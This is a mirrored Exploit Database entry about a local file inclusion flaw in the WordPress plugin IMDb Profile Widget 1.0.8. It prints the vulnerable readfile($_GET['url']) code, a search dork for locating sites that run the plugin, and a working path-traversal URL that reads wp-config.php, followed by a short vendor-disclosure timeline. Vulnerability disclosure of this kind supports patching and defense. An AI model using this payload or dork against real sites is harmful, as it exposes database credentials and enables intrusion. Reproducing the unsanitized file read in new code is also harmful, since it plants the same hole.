WordPress Plugin IMDb Profile Widget 1.0.8 – Local File Inclusion

• Exploit Database
• 128 阅读

• 作者： CrashBandicot
  日期： 2016-03-27
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/39621/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22

  # Exploit Title: WordPress Plugin IMDb Profile Widget - Local File Inclusion # Exploit Author: CrashBandicot @DosPerl # Date: 2016-03-26 # Google Dork : inurl:/wp-content/plugins/imdb-widget # Vendor Homepage: https://wordpress.org/plugins/imdb-widget/ # Tested on: MSWin32 # Version: 1.0.8   # Vuln file : pic.php   <?php   header( &apos;Content-Type: image/jpeg&apos; ); readfile( $_GET["url"] );     # PoC : /wp-content/plugins/imdb-widget/pic.php?url=../../../wp-config.php # Right click -> Save As -> rename pic.jpg in .txt and read file   # 26/03/2016 - Informed Vendor about Issue # 27/03/2016 - Waiting Reply